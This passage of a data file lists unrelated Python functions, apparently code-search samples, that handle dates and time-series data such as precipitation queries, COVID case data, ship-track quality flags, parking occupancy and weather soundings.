except:\n print('Invalid/empty date entry (year, month, day take valid int inputs)! Date defaulted to today.')\n self.date = datetime.today()\n \n if self.date > datetime.today():\n print('Can\\'t input future date! Date defaulted to today.')\n self.date = datetime.today()\n \n if map_type not in ['Cases', 'Deaths']:\n sys.exit('Please specify either \"Cases\" or \"Deaths\" as map type!')\n else:\n self.map_type = map_type", "def precipitation():\n # Calculate the date 1 year ago from the last data point in the database\n #Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Use query from notebook. 
Get the last date in database, then calc a year before \n last_date = session.query(func.max(Measurement.date)).first() \n year_ago = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # filter to one year ago \n twelve_months_precip = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= year_ago).all()\n\n session.close()\n\n # create a list for results to jsonify \n\n list_data = []\n for months in twelve_months_precip:\n data = {}\n data[\"date\"] = months[0]\n data[\"prcp\"] = months[1]\n list_data.append(data)\n\n # jsonify the results \n\n return jsonify(list_data)", "def precipitation():\n # Calculate teh date 1 year ago from last date in database\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # Query for the date and precipitation for the last year\n precipitation = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= prev_year).all()\n \n precip = {date: prcp for date, prcp in precipitation}\n return jsonify(precip)", "def get_data(self, gauge_name, date_key):\n pass", "def load_covid_cases_data_all():\n covid_data = dict()\n date = datetime.strptime('03-23-2020', '%m-%d-%Y') # first date johns hopkins included county data\n today = datetime.today()\n while date <= today:\n covid_data[date.strftime('%m-%d-%Y')] = load_covid_cases_data(date)\n date = date + timedelta(days=1)\n return covid_data", "def analyse_course(position_df):\n\n print(\"Analysing course of track\")\n total_data_points = len(position_df)\n\n earliest_date_time = position_df['date_time'].min()\n current_date = earliest_date_time\n\n previous_position = get_location(earliest_date_time, position_df)\n datetime_previous, latitude_previous, longitude_previous = previous_position\n\n previous_speed_knots = 0\n\n count_acceleration_errors = 0\n\n line_number = -1\n for position in position_df.itertuples():\n line_number += 1\n row_index = position[0]\n\n if line_number == 0:\n #position_df.at[row_index, 'measureland_qualifier_flag_course'] = 1 # assume good value\n position_df.at[row_index, 'measureland_qualifier_flag_acceleration'] = 1 # assume good value\n continue\n\n current_position = position[2:5]\n\n # Calculate acceleration between two points\n current_conditions = knots_two_points(previous_position, current_position)\n current_speed_knots = current_conditions[1] # altered to this because distance and speed are output as a tuple from knots_two_points\n\n time_difference = (current_position[0] - previous_position[0]).total_seconds()\n\n speed_difference_metres_per_sec = (current_speed_knots - previous_speed_knots) * (1852 / 3600) # convert knots to ms-1\n if time_difference > 0:\n acceleration = speed_difference_metres_per_sec / time_difference\n else:\n acceleration = 0\n\n # Print errors where data do not meet requirements\n error_message_acceleration = \"\"\n\n if acceleration == \"N/A\":\n error_message_acceleration = \"No acceleration value calculated\"\n position_df.at[row_index, 'measureland_qualifier_flag_acceleration'] = 9 # no value\n elif acceleration > 1:\n count_acceleration_errors += 1\n error_message_acceleration = \"** Acceleration too quick **\"\n position_df.at[row_index, 'measureland_qualifier_flag_acceleration'] = 3 # probably bad value\n elif acceleration <= 1:\n position_df.at[row_index, 'measureland_qualifier_flag_acceleration'] = 1 # good value\n\n # if error_message_acceleration != \"\":\n # print(\"Error: {} {} ({:.4f}, {:.4f}) acceleration: {} ms-2\".format(error_message_acceleration,\n # current_position[0],\n # 
current_position[1],\n # current_position[2], acceleration))\n\n previous_position = current_position\n #previous_bearing = current_bearing\n previous_speed_knots = current_speed_knots\n\n #position_df['measureland_qualifier_flag_course'] = position_df['measureland_qualifier_flag_course'].astype(int)\n position_df['measureland_qualifier_flag_acceleration'] = position_df['measureland_qualifier_flag_acceleration'].astype(int)\n\n return (count_acceleration_errors)", "def _calc_solar_and_precip(netcdf_start_date, netcdf_end_date, dest_dir, tmp_dir):\n hrs_range = arrow.Arrow.range(\n \"hour\", netcdf_start_date, netcdf_end_date.shift(hours=+23)\n )\n for netcdf_hr in hrs_range:\n prev_hr = netcdf_hr.shift(hours=-1)\n prev_nemo_date = f\"y{prev_hr.year}m{prev_hr.month:02d}d{prev_hr.day:02d}\"\n prev_nemo_hr_ds_path = (\n tmp_dir / f\"gemlam_{prev_nemo_date}_{prev_hr.hour:03d}.nc\"\n )\n nemo_date = f\"y{netcdf_hr.year}m{netcdf_hr.month:02d}d{netcdf_hr.day:02d}\"\n nemo_hr_ds_path = tmp_dir / f\"gemlam_{nemo_date}_{netcdf_hr.hour:03d}.nc\"\n nemo_hr_ds_dest = dest_dir / nemo_hr_ds_path.name\n shutil.copy2(nemo_hr_ds_path, nemo_hr_ds_dest)\n bash_cmd = (\n f\"avg-diff-hrs {prev_nemo_hr_ds_path} {nemo_hr_ds_path} {nemo_hr_ds_dest}\"\n )\n _exec_bash_func(bash_cmd)", "def RecordEphemerisData(self):\n return _gmat_py.EphemManager_RecordEphemerisData(self)", "def getFX(date, targetCurrency):\n\treturn \\\n\tcompose(\n\t\tpartial(mergeDict, {targetCurrency: 1.0})\n\t , dict\n\t , partial(map, lambda p: (p['Currency'], p['FX']))\n\t , partial( filter\n\t \t\t , lambda p: toDateString(p['Date']) == date and p['Reporting Currency'] == targetCurrency\n\t \t\t )\n\t , getRawPositionsFromFile\n\t , partial(join, getDataDirectory())\n\t)('FX.xlsx')", "def _series_date_value_iter(data_points: List[dict]) -> Generator:\n for data_point in data_points:\n yield data_point[\"generic:ObsDimension\"][\"@value\"], data_point[\"generic:ObsValue\"][\"@value\"]", "def compute_obs():\n sql = \"\"\"\nSELECT\n s.id, ST_x(s.geom) as lon, ST_y(s.geom) as lat,\n sum(CASE WHEN\n day = 'TODAY'::date and pday > 0\n THEN pday ELSE 0 END) as p01,\n sum(CASE WHEN\n day IN ('TODAY'::date,'YESTERDAY'::date) and pday > 0\n THEN pday ELSE 0 END) as p02,\n sum(CASE WHEN\n pday > 0\n THEN pday ELSE 0 END) as p03\nFROM\n summary_%s c, stations s\nWHERE\n s.network in ('IA_ASOS', 'AWOS') and\n s.iemid = c.iemid and\n day IN ('TODAY'::date,'YESTERDAY'::date, 'TODAY'::date - '2 days'::interval)\nGROUP by s.id, lon, lat\n \"\"\" % (datetime.date.today().year,)\n icursor.execute(sql)\n data = {}\n for row in icursor:\n data[row['id']] = row\n return data", "def precipitation():\n \n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \n # Query all precipitation data from the last year\n year_ago = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= str(year_ago)).\\\n order_by(Measurement.date).all()\n \n session.close()\n\n # Convert list of tuples into dictionary\n result_dict={}\n for row in results:\n result_dict.update({row[0] : row[1]})\n\n return jsonify(result_dict)", "def _build_parsed_values(self):\n # need to exclude sci times\n return self._parsed_values(GpsPositionDataParticle.keys_exclude_all_times)", "def cubicspline(df):\r\n listDI = [ [n,y(df,n)] for n in range(1,max(df['Vertices']))]\r\n df_spline = pd.DataFrame(listDI, columns = ['Days', 'DIxPRE 252'])\r\n return df_spline", "def precipitation():\n \n 
precipit = (session.query(Measurement.date, Measurement.prcp, Measurement.station).filter(Measurement.date > prevyeardates).order_by(Measurement.date).all()) \n\n session.close()\n\n PrecipitData=[]\n\n for data in precipit:\n PrecipitDict={data.date: data.prcp, \"Station\": data.station}\n PrecipitData.append(PrecipitDict)\n\n return jsonify(PrecipitData)", "def fetchEquityDataForSingleDay(on_date, useCache=False):\n return fetchEquityData(on_date, on_date, useCache)", "def Extract_data_for_plotting(COVID_data, X_Axis_inc, Y_Axis_inc, Z_Axis_inc, Date_start, Date_end, Keep_no_PR = True):\r\n Date_start_obj = datetime.strptime(Date_start, '%Y-%m-%d') # Create a list of all the dates to extract\r\n Date_end_obj = datetime.strptime(Date_end, '%Y-%m-%d')\r\n Date_difference = (Date_end_obj - Date_start_obj).days + 1\r\n \r\n Date_list = [(Date_start_obj + timedelta(Days)).isoformat()[:10] for Days in range(Date_difference)]\r\n \r\n Countries_list = list(COVID_data.keys())[1:]\r\n\r\n COVID_data_scatter = {'0Date': {'Country': [COVID_data['_Country']['Date'][Axis_inc] for Axis_inc in [X_Axis_inc, Y_Axis_inc, Z_Axis_inc]]}}\r\n \r\n for Date in Date_list: # For each date and each country...\r\n COVID_data_scatter[Date] = {}\r\n for Country in Countries_list:\r\n try:\r\n Data_items = [COVID_data[Country][Date][Axis_inc] for Axis_inc in [X_Axis_inc, Y_Axis_inc, Z_Axis_inc]] # This line will prompt an error in case the data doesn't exist, hence the try - except structure (much easier than 10 000 conditions to try to figure out if the data exists for a date and country)\r\n \r\n if None not in Data_items[:2] and not (not Keep_no_PR and Data_items[2] == None): # Any data point that has a None as its X or Y coordinate is exlcuded, and also Z if asked by the user\r\n if min(Data_items[:2]) > 0: COVID_data_scatter[Date][Country] = Data_items # Since the graph is in logscale, points with 0 as their X or Y coordinate are excluded (because log(0) doesn't exist).\r\n # This double verification can't be done in one line because having None in a list you're trying to find the minimum of prompts an error\r\n except: pass\r\n \r\n if COVID_data_scatter[Date] == {}: COVID_data_scatter.pop(Date)\r\n \r\n return COVID_data_scatter", "def _get_datas(self):\n print(f'base name {self.base_name}')\n data_file_name = glob(osp.join(self.root_dir, MERGED_PATTERN))[0]\n data_df = pd.read_csv(data_file_name)\n\n ppg_d = data_df[['CurrentTimeMillis', 'ch1']].values\n acc_d = data_df[[\n 'EventTimestamp(ns)', 'accel_x', 'accel_y', 'accel_z'\n ]].values\n ppg_d = ppg_d[::2]\n acc_d = acc_d[::2]\n\n return acc_d, ppg_d", "def _obtain_data(self):\n (self.data_df, self.column_df, self.station_name, self.log_file, self.station_lat, self.station_lon,\n self.station_elev, self.ws_anemometer_height, self.missing_fill_value, self.script_mode,\n self.auto_mode, self.fill_mode, self.metadata_mode, self.generate_bokeh, self.metadata_df,\n metadata_series) = input_functions.obtain_data(self.config_path, self.metadata_path)\n\n if self.script_mode == 1: # correcting data\n self.mc_iterations = 1000 # Number of iters for MC simulation of thornton running solar radiation gen\n else:\n self.mc_iterations = 50 # if we're not correcting data then only do a few iterations to save time\n\n print(\"\\nSystem: Raw data successfully extracted from station file.\")\n\n # Extract individual variables from data frame back into to numpy arrays.\n self.data_year = np.array(self.data_df.year)\n self.data_month = np.array(self.data_df.month)\n 
self.data_day = np.array(self.data_df.day)\n self.data_tavg = np.array(self.data_df.tavg)\n self.data_tmax = np.array(self.data_df.tmax)\n self.data_tmin = np.array(self.data_df.tmin)\n self.data_tdew = np.array(self.data_df.tdew)\n self.data_ea = np.array(self.data_df.ea)\n self.data_rhavg = np.array(self.data_df.rhavg)\n self.data_rhmax = np.array(self.data_df.rhmax)\n self.data_rhmin = np.array(self.data_df.rhmin)\n self.data_rs = np.array(self.data_df.rs)\n self.data_ws = np.array(self.data_df.ws)\n self.data_precip = np.array(self.data_df.precip)\n\n self.output_file_path = \"correction_files/\" + self.station_name + \"_output\" + \".xlsx\"", "def load_data(data_path, load_paths, month_year_start, month_year_end, \n day_start=None, day_end=None, verbose=False):\n \n # Load file containing GPS coordinates for blockfaces.\n with open(os.path.join(data_path, 'blockface_locs.p'), 'rb') as f:\n locations = pickle.load(f)\n \n # Load sheet containing blockface info about blockface operating times.\n block_info = pd.read_csv(os.path.join(data_path, 'block_info.csv'))\n keep_columns = ['ElementKey', 'PeakHourStart1', 'PeakHourEnd1', \n 'PeakHourStart2', 'PeakHourEnd2', 'PeakHourStart3', \n 'PeakHourEnd3', 'EffectiveStartDate', 'EffectiveEndDate']\n block_info = block_info[keep_columns]\n \n # Converting to datetime format for processing.\n for col in keep_columns:\n if 'Hour' in col:\n block_info.loc[:, col] = pd.to_datetime(block_info[col]).dt.time\n elif 'Date' in col:\n block_info.loc[:, col] = pd.to_datetime(block_info[col])\n else:\n pass\n \n # Loading holiday information for when paid parking is not available.\n cal = USFederalHolidayCalendar()\n holidays = cal.holidays(start='2012-01-01', end=datetime.datetime.now().date()).to_pydatetime()\n holidays = [hol.date() for hol in holidays]\n\n # Getting starting and ending date to keep data for.\n if day_start == None:\n day_start = 1\n if day_end == None:\n day_end = calendar.monthrange(month_year_end[1], month_year_end[0])[1]\n\n date_start = datetime.date(month_year_start[1], month_year_start[0], day_start)\n date_end = datetime.date(month_year_end[1], month_year_end[0], day_end)\n\n avg_loads = []\n gps_loc = []\n element_keys = []\n park_data = {}\n \n if isinstance(load_paths, list):\n pass\n else:\n load_paths = [load_paths]\n\n for load_path in load_paths:\n for fi in sorted(glob.glob(load_path + os.sep + '*.csv'), key=lambda fi: int(fi.split(os.sep)[-1].split('.')[0])):\n key = int(fi.split(os.sep)[-1].split('.')[0])\n\n block_data = pd.read_csv(fi, names=['Datetime', 'Load'])\n\n block_data['Datetime'] = pd.to_datetime(block_data['Datetime'])\n block_data.sort_values(by='Datetime', inplace=True)\n\n # Dropping days where the supply was 0 for this blockface.\n block_data.dropna(inplace=True)\n\n block_data['Date'] = block_data['Datetime'].dt.date\n block_data['Time'] = block_data['Datetime'].dt.time\n block_data['Day'] = block_data['Datetime'].dt.weekday\n block_data['Hour'] = block_data['Datetime'].dt.hour\n block_data['Minute'] = block_data['Datetime'].dt.minute\n\n # Keeping the data in the specified date range.\n block_data = block_data.loc[(block_data['Date'] >= date_start) & (block_data['Date'] <= date_end)]\n\n # Getting rid of Sunday since there is no paid parking.\n block_data = block_data.loc[block_data['Day'] != 6]\n\n # Dropping the days where the total parking is 0 because of holidays.\n block_data = block_data.loc[~block_data['Date'].isin(holidays)]\n block_data.reset_index(inplace=True, drop=True)\n\n # Clipping the 
loads to be no higher than 1.5\n block_data['Load'] = block_data['Load'].clip_upper(1.5)\n\n # If block contains no data, skip it.\n if len(block_data) == 0:\n if verbose:\n print('Skipping block %d because the supply is always 0.' % key)\n continue\n\n # If the block always has 0 occupancy, skip it.\n if len(block_data.loc[block_data['Load'] != 0]) == 0:\n if verbose:\n print('Skipping block %d because the occupancy is always 0.' % key)\n continue\n\n # Get GPS midpoint for block-face and skip if no information for it.\n if key in locations:\n curr_block = locations[key]\n\n lat1, lat2 = curr_block[1], curr_block[-2]\n lon1, lon2 = curr_block[0], curr_block[-3]\n\n mid_lat = (lat1 + lat2)/2.\n mid_long = (lon1 + lon2)/2.\n gps_loc.append([mid_lat, mid_long])\n else:\n if verbose:\n print('Skipping block %d because it was not found in locations.' % key)\n continue\n\n # Getting block-face info for the current key about hours of operation.\n curr_block_info = block_info.loc[block_info['ElementKey'] == key]\n\n # Filling times where paid parking is not allowed for the block with nan.\n for index, row in curr_block_info.iterrows():\n row_null = row.isnull()\n\n if not row_null['PeakHourStart1'] and not row_null['PeakHourStart2'] and not row_null['PeakHourStart3']:\n continue\n\n if not row_null['EffectiveEndDate']:\n row['EffectiveEndDate'] += datetime.timedelta(hours=23, minutes=59, seconds=59)\n\n if not row_null['PeakHourStart1']:\n\n start1 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourStart1']) for i in xrange(len(block_data))])\n end1 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourEnd1']) for i in xrange(len(block_data))])\n\n if row_null['EffectiveEndDate']:\n mask1 = ((row['EffectiveStartDate'] <= block_data['Datetime'])\n & (start1 <= block_data['Datetime']) \n & (end1 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n else:\n mask1 = ((row['EffectiveStartDate'] <= block_data['Datetime']) \n & (row['EffectiveEndDate'] >= block_data['Datetime'])\n & (start1 <= block_data['Datetime']) \n & (end1 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n\n block_data.loc[mask1, 'Load'] = np.nan \n\n if not row_null['PeakHourStart2']:\n\n start2 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourStart2']) for i in xrange(len(block_data))])\n end2 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourEnd2']) for i in xrange(len(block_data))])\n\n if row_null['EffectiveEndDate']:\n mask2 = ((row['EffectiveStartDate'] <= block_data['Datetime'])\n & (start2 <= block_data['Datetime']) \n & (end2 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n else:\n mask2 = ((row['EffectiveStartDate'] <= block_data['Datetime']) \n & (row['EffectiveEndDate'] >= block_data['Datetime'])\n & (start2 <= block_data['Datetime']) \n & (end2 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n\n block_data.loc[mask2, 'Load'] = np.nan \n\n if not row_null['PeakHourStart3']:\n\n start3 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourStart3'])\n for i in xrange(len(block_data))])\n end3 = pd.Series([datetime.datetime.combine(block_data.loc[i, 'Date'], row['PeakHourEnd3'])\n for i in xrange(len(block_data))])\n\n if row_null['EffectiveEndDate']:\n mask3 = ((row['EffectiveStartDate'] <= block_data['Datetime'])\n & (start3 <= block_data['Datetime']) \n & (end3 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n else:\n mask3 = 
((row['EffectiveStartDate'] <= block_data['Datetime']) \n & (row['EffectiveEndDate'] >= block_data['Datetime'])\n & (start3 <= block_data['Datetime']) \n & (end3 > block_data['Datetime'])\n & (block_data['Day'] != 5))\n\n block_data.loc[mask3, 'Load'] = np.nan \n\n # Getting the average load for each hour of the week for the block.\n avg_load = block_data.groupby(['Day', 'Hour'])['Load'].mean().values.reshape((1,-1))\n\n # If there is not data skip it.\n if avg_load.shape != (1, 72):\n gps_loc.pop()\n continue\n\n avg_loads.append(avg_load)\n element_keys.append(key)\n park_data[key] = block_data\n \n # Each row has load and GPS locations for a block. Ordered as in element_keys.\n avg_loads = np.vstack((avg_loads))\n gps_loc = np.vstack((gps_loc))\n\n index = park_data[park_data.keys()[0]].groupby(['Day', 'Hour']).sum().index\n\n days = index.get_level_values(0).unique().values\n days = np.sort(days)\n\n hours = index.get_level_values(1).unique().values\n hours = np.sort(hours)\n\n idx_to_day_hour = {i*len(hours) + j:(days[i], hours[j]) for i in range(len(days)) \n for j in range(len(hours))}\n day_hour_to_idx = {v:k for k,v in idx_to_day_hour.items()}\n \n for key in park_data:\n park_data[key] = park_data[key].set_index('Datetime')\n\n # Merging the dataframes into multi-index dataframe.\n park_data = pd.concat(park_data.values(), keys=park_data.keys())\n\n park_data.index.names = ['ID', 'Datetime']\n\n # Making the first index the date, and the second the element key, sorted by date.\n park_data = park_data.swaplevel(0, 1).sort_index()\n\n return element_keys, avg_loads, gps_loc, park_data, idx_to_day_hour, day_hour_to_idx", "def get_data(self, date_time):\n id_columns = ','.join([col for col in self.table_primary_keys if col not in ['EFFECTIVEDATE', 'VERSIONNO']])\n return_columns = ','.join(self.table_columns)\n with self.con:\n cur = self.con.cursor()\n cur.execute(\"DROP TABLE IF EXISTS temp;\")\n cur.execute(\"DROP TABLE IF EXISTS temp2;\")\n cur.execute(\"DROP TABLE IF EXISTS temp3;\")\n cur.execute(\"DROP TABLE IF EXISTS temp4;\")\n # Store just the unique sets of ids that came into effect before the the datetime in a temporary table.\n query = \"\"\"CREATE TEMPORARY TABLE temp AS \n SELECT * \n FROM {table} \n WHERE EFFECTIVEDATE <= '{datetime}';\"\"\"\n cur.execute(query.format(table=self.table_name, datetime=date_time))\n # For each unique set of ids and effective dates get the latest versionno and sore in temporary table.\n query = \"\"\"CREATE TEMPORARY TABLE temp2 AS\n SELECT {id}, EFFECTIVEDATE, MAX(VERSIONNO) AS VERSIONNO\n FROM temp\n GROUP BY {id}, EFFECTIVEDATE;\"\"\"\n cur.execute(query.format(id=id_columns))\n # For each unique set of ids get the record with the most recent effective date.\n query = \"\"\"CREATE TEMPORARY TABLE temp3 as\n SELECT {id}, VERSIONNO, max(EFFECTIVEDATE) as EFFECTIVEDATE\n FROM temp2\n GROUP BY {id};\"\"\"\n cur.execute(query.format(id=id_columns))\n # Inner join the original table to the set of most recent effective dates and version no.\n query = \"\"\"CREATE TEMPORARY TABLE temp4 AS\n SELECT * \n FROM {table} \n INNER JOIN temp3 \n USING ({id}, VERSIONNO, EFFECTIVEDATE);\"\"\"\n cur.execute(query.format(table=self.table_name, id=id_columns))\n # Inner join the most recent data with the interconnectors used in the actual interval of interest.\n query = \"\"\"SELECT {cols} FROM temp4 ;\"\"\"\n query = query.format(cols=return_columns)\n data = pd.read_sql_query(query, con=self.con)\n return data", "def v_positions(self, 
date=yesterdayobj(), rendered=True):\n sdata = sorted(\n [\n (fob.name, fob.briefdailyreport(date).get(\"currentvalue\", 0))\n for fob in self.fundtradeobj\n ],\n key=lambda x: x[1],\n reverse=True,\n )\n pie = Pie()\n pie.add(\n series_name=\"总值占比\",\n data_pair=sdata,\n label_opts=opts.LabelOpts(is_show=False, position=\"center\"),\n ).set_global_opts(\n legend_opts=opts.LegendOpts(\n pos_left=\"left\", type_=\"scroll\", orient=\"vertical\"\n )\n ).set_series_opts(\n tooltip_opts=opts.TooltipOpts(\n trigger=\"item\", formatter=\"{a} <br/>{b}: {c} ({d}%)\"\n ),\n )\n\n if rendered:\n return pie.render_notebook()\n else:\n return pie", "def sun_single_day(date):\r\n\r\n\tsun = l.sun(date=date, local=True)\r\n\tsunrise = sun['sunrise']\r\n\tsunset = sun['sunset']\r\n\tday_length = str(sunset-sunrise)\r\n\tsolar_noon = l.solar_noon(date=date, local=True)\r\n\tsolar_zenith = l.solar_elevation(solar_noon.replace(tzinfo=None))\r\n\r\n\treturn {'sunrise':sunrise, 'sunset': sunset, 'daylength': day_length, 'solar_noon': solar_noon, 'zenith': solar_zenith}", "def precipitation(pre_date):\n # Query for the dates and temperature observations from the last year.\n # Convert the query results to a Dictionary using `date` as the key and `tobs` as the value.\n # Return the json representation of your dictionary.\n results = session.query(Measurement).filter(Measurement.date == pre_date)\n\n # Print all passengers of that gender\n all_tobs = [] \n for measure in results:\n measure_dict = {}\n measure_dict[\"station\"] = measure.station\n measure_dict[\"date\"] = measure.date\n measure_dict[\"prcp\"] = measure.prcp\n all_tobs.append(measure_dict)\n\n return jsonify(all_tobs)\n\n\n # print(results)\n # Convert list of tuples into normal list\n # all_names = list(np.ravel(results))\n # print(all_names)\n\n # print(all_names)\n return jsonify({'TempMin': tmp_min, 'TempMax': tmp_max, 'TempAvg': tmp_avg})", "def generate_portfolio_data(self):\n self.__load_portfolio_historical_prices()\n self.__populate_historical_trade_data()\n self.__calculate_portfolio_returns()\n self.__calculate_portfolio_performance()", "def _data():\n data = {s: {} for s in systems}\n\n # PbPb2760 and PbPb5020 dNch/deta\n for system, args, name in [\n ('PbPb2760', (880049, 1), 'D(N)/DETARAP'),\n ('PbPb5020', (1410589, 2),\n r'$\\mathrm{d}N_\\mathrm{ch}/\\mathrm{d}\\eta$'),\n ]:\n data[system]['dNch_deta'] = {None: HEPData(*args).dataset(name)}\n\n # PbPb2760 transverse energy\n # ignore bin 0-5 since it's redundant with 0-2.5 and 2.5-5\n dset = HEPData(1427723, 1).dataset('$E_{T}$', ignore_bins=[(0, 5)])\n dset['yerr']['sys'] = dset['yerr'].pop('sys,total')\n data['PbPb2760']['dET_deta'] = {None: dset}\n\n # PbPb2760 identified dN/dy and mean pT\n system = 'PbPb2760'\n\n for obs, table, combine_func in [\n ('dN_dy', 31, np.sum),\n ('mean_pT', 32, np.mean),\n ]:\n data[system][obs] = {}\n d = HEPData(1222333, table)\n for key, re_products in [\n ('pion', ['PI+', 'PI-']),\n ('kaon', ['K+', 'K-']),\n ('proton', ['P', 'PBAR']),\n ]:\n dsets = [\n d.dataset(RE='PB PB --> {} X'.format(i))\n for i in re_products\n ]\n\n data[system][obs][key] = dict(\n dsets[0],\n y=combine_func([d['y'] for d in dsets], axis=0),\n yerr={\n e: combine_func([d['yerr'][e] for d in dsets], axis=0)\n for e in dsets[0]['yerr']\n }\n )\n\n # PbPb2760 strange baryon yields\n data['PbPb2760']['dN_dy']['Lambda'] = HEPData(1243863, 23).dataset(\n RE='PB PB --> LAMBDA X'\n )\n\n d = HEPData(1243865, 11)\n for s in ['Xi', 'Omega']:\n data[system]['dN_dy'][s] = d.dataset(\n 
RE='PB PB --> ({0}- + {0}BAR+) X'.format(s.upper())\n )\n\n # PbPb2760 mean pT fluctuations\n d = HEPData(1307102, 6, reverse=True)\n name = r'$\\sqrt{C_m}/M(p_{\\rm T})_m$'\n # the table only has Npart, but they are actually 5% centrality bins\n width = 5.\n d.cent = [(n*width, (n+1)*width) for n, _ in enumerate(d.y(name))]\n data['PbPb2760']['pT_fluct'] = {None: d.dataset(name, maxcent=60)}\n\n # PbPb2760 and PbPb5020 flows\n for system, tables_nk in [\n ('PbPb5020', [\n (1, [(2, 2), (2, 4)]),\n (2, [(3, 2), (4, 2)]),\n ]),\n ('PbPb2760', [\n (3, [(2, 2), (2, 4)]),\n (4, [(3, 2), (4, 2)]),\n ]),\n ]:\n data[system]['vnk'] = {}\n\n for table, nk in tables_nk:\n d = HEPData(1419244, table)\n for n, k in nk:\n data[system]['vnk'][n, k] = d.dataset(\n 'V{}{{{}{}}}'.format(\n n, k, ', |DELTAETA|>1' if k == 2 else ''\n ),\n maxcent=(70 if n == 2 else 50)\n )\n\n # PbPb2760 central flows vn{2}\n system, obs = 'PbPb2760', 'vnk_central'\n data[system][obs] = {}\n\n for n, table, sys_err_frac in [(2, 11, .025), (3, 12, .040)]:\n dset = HEPData(900651, table).dataset()\n # the (unlabeled) errors in the dataset are actually stat\n dset['yerr']['stat'] = dset['yerr'].pop('sum')\n # sys error is not provided -- use estimated fractions\n dset['yerr']['sys'] = sys_err_frac * dset['y']\n data[system][obs][n, 2] = dset\n\n # PbPb2760 flow correlations\n for obs, table in [\n ('sc', 1),\n ('sc_normed', 2),\n ('sc_central', 3),\n ('sc_normed_central', 4)\n ]:\n d = HEPData(1452590, table)\n data['PbPb2760'][obs] = {\n mn: d.dataset('SC({},{})'.format(*mn))\n for mn in [(3, 2), (4, 2)]\n }\n\n return data", "def precipitation():\n\n # Query all Measurement\n prcp_results = session.query(Measurement).all()\n\n # Creating a dictionary and appending a list of Measurements to it\n all_prcp_results = []\n for prcp in prcp_results:\n prcp_dict = {}\n prcp_dict[\"date\"] = prcp.date\n prcp_dict[\"precipitation\"] = prcp.prcp\n all_prcp_results.append(prcp_dict)\n\n return jsonify(all_prcp_results)", "def process_data(self):\n logging.debug('process_data called')\n\n pd_time_series = pd.read_csv(f'{self.out_dir}docs/downloaded/'\n f'{self.filename}')\n\n pd_time_series = pd_time_series.drop('Lat', axis=1)\n pd_time_series = pd_time_series.drop('Long', axis=1)\n no_of_dates = len(pd_time_series.columns) - 2\n dateindex = pd.date_range(start='1-22-2020',\n periods=no_of_dates,\n freq='D').strftime('%d-%m')\n\n new_cols = ['Province/State', 'Country/Region']\n for index in dateindex:\n new_cols.append(index)\n pd_time_series.columns = new_cols\n\n pd_time_series = pd_time_series.drop('Province/State', axis=1)\n pd_edit_series = pd_time_series.set_index('Country/Region')\n\n pd_edit_series = pd_edit_series.T\n\n return pd_edit_series", "def get_nhc_forecast_dict(self, time):\n\n # Check to ensure the data source is HURDAT\n if self.source != \"hurdat\":\n raise RuntimeError(\n \"Error: NHC data can only be accessed when HURDAT is used as the data source.\")\n\n # Check to ensure storm is not an invest\n if self.invest:\n raise RuntimeError(\n \"Error: NHC does not issue advisories for invests that have not been designated as Potential Tropical Cyclones.\")\n\n # Get forecasts dict saved into storm object, if it hasn't been already\n try:\n self.forecast_dict\n except:\n self.get_operational_forecasts()\n\n # Get all NHC forecast entries\n nhc_forecasts = self.forecast_dict['OFCL']\n\n # Get list of all NHC forecast initializations\n nhc_forecast_init = [k for k in nhc_forecasts.keys()]\n\n # Find closest matching time 
to the provided forecast time\n nhc_forecast_init_dt = [dt.strptime(\n k, '%Y%m%d%H') for k in nhc_forecast_init]\n time_diff = np.array(\n [(i - time).days + (i - time).seconds / 86400 for i in nhc_forecast_init_dt])\n closest_idx = np.abs(time_diff).argmin()\n forecast_dict = nhc_forecasts[nhc_forecast_init[closest_idx]]\n if np.abs(time_diff[closest_idx]) >= 1.0:\n warnings.warn(\n f\"The time provided is outside of the duration of the storm. Returning the closest available NHC forecast.\")\n\n return forecast_dict", "def get_cape(temp,pres,dewpt,hght,startp,startt,startdp,totalcape=False): \n\n # Check units\n # Init temp is startt in C, Init dew point is stwrtdp,\n # pressure levels are in hPa \n temp = temp - 273.15 # convert temperature to celsius\n dewpt = dewpt - 273.15 # convert dewpoint to celsius\n pres = pres/100 # convert pressure to hPa\n \n \n inds = np.where( (pres < startp) ) \n tmp = pres[inds]\n del pres\n #pres = tmp[::-1]\n pres = tmp[:]\n del tmp \n startp = startp/100\n \n tmp = temp[inds]\n del temp\n #temp = tmp[::-1]\n temp = tmp[:]\n del tmp \n\n tmp = dewpt[inds]\n del dewpt\n #dewpt = tmp[::-1]\n dewpt = tmp[:]\n del tmp \n\n tmp = hght[inds]\n del hght\n #hght = tmp[::-1]\n hght = tmp[:]\n del tmp \n\n \n # Get Sub-LCL traces \n presdry,tempdry,tempiso=dry_ascent(startp,startt-degCtoK,startdp-degCtoK) \n \n\n # make lcl variables explicit\n P_lcl=presdry[-1]\n T_lcl=tempdry[-1]\n\n # Now lift a wet parcel from the intersection point\n # preswet=linspace(P_lcl,100,101)\n preswet,tempwet=moist_ascent(P_lcl,T_lcl)\n\n # tparcel is the concatenation of tempdry and \n # tempwet, and so on.\n \n tparcel=np.concatenate((tempdry,tempwet[1:]))\n pparcel=np.concatenate((presdry,preswet[1:]))\n\n # Interpolating the environmental profile onto the \n # parcel pressure coordinate\n # tempenv=interp(preswet,pres[::-1],temp[::-1])\n ## NEW, for total column:\n tempenv=interp(pparcel,pres[::-1],temp[::-1])\n\n\n # now solve for the equlibrium levels above LCL\n # (all of them, including unstable ones)\n # 